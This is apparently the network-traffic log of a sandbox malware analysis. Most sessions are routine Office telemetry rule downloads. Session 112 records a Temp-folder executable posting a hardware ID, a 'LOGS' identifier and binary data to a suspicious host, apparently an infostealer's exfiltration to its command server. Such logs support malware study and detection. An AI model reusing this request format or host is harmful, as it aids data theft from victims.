Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:41 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:41 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: dcdca57e-b01e-003e-0dcb-3b8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193641Z-15b8b599d88m7pn7hC1TEB4axw000000020g0000000032py x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-22 19:36:41 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:42 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:43 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:43 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 9aa8fa60-a01e-001e-5131-3c49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193643Z-178bfbc474bscnbchC1NYCe7eg00000003ng000000003gp9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:43 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:43 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:43 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:43 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193643Z-178bfbc474bbbqrhhC1NYCvw7400000003g000000000nmsa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:43 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:43 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:43 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:43 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 358685dd-301e-005d-4f7d-3be448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193643Z-174c587ffdfcb7qhhC1TEB3x7000000001x000000000h5rn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:43 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:43 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:43 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:43 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: e2992625-501e-005b-678c-3ad7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193643Z-174c587ffdf89smkhC1TEB697s00000001w000000000pcgq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:43 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49878	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:43 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YKCIW7L2B84XB5GB19 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: property-imper.sbs
2024-11-22 19:36:43 UTC	15331	OUT	Data Raw: 2d 2d 59 4b 43 49 57 37 4c 32 42 38 34 58 42 35 47 42 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 4b 43 49 57 37 4c 32 42 38 34 58 42 35 47 42 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 4b 43 49 57 37 4c 32 42 38 34 58 42 35 47 42 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --YKCIW7L2B84XB5GB19Content-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--YKCIW7L2B84XB5GB19Content-Disposition: form-data; name="pid"3--YKCIW7L2B84XB5GB19Content-Disposition: form-data; name="lid"LOGS11--LiveT
2024-11-22 19:36:43 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2024-11-22 19:36:44 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fcq19udc31789pfac8lhqef99a; expires=Tue, 18-Mar-2025 13:23:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dYuScZAHKJn2R37OAaEE4FllbTmrQSXL2PITUXL1s59uYFm0UHVso9lImdczxmLj6KIFZpO9QXhYD70goEiFFyBi1xZzVXJOOHEIkROZ2H8FaubxYyqYhnHk59gbwIf6LsYhEs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5eb98ddd8ca7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21407&delivery_rate=1566523&cwnd=128&unsent_bytes=0&cid=3ec1ba0739337aea&ts=1097&x=0"
2024-11-22 19:36:44 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49877	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:43 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:44 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:43 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: af8656a8-801e-00a0-672a-3c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193643Z-178bfbc474bscnbchC1NYCe7eg00000003hg00000000eh52 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:44 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49879	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:45 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:45 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:45 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: f6495d06-a01e-0021-3357-3c814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193645Z-178bfbc474bq2pr7hC1NYCkfgg00000003m0000000008axd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:45 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49880	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:45 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:45 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:45 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193645Z-178bfbc474b7cbwqhC1NYC8z4n00000003ag00000000cuqc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:45 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:45 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:45 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:45 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193645Z-178bfbc474bv7whqhC1NYC1fg4000000039g00000000wcdm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:45 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:45 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:46 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:46 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 45241df0-c01e-00a1-1a4f-3c7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193646Z-178bfbc474bv7whqhC1NYC1fg400000003a000000000tq2r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:46 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 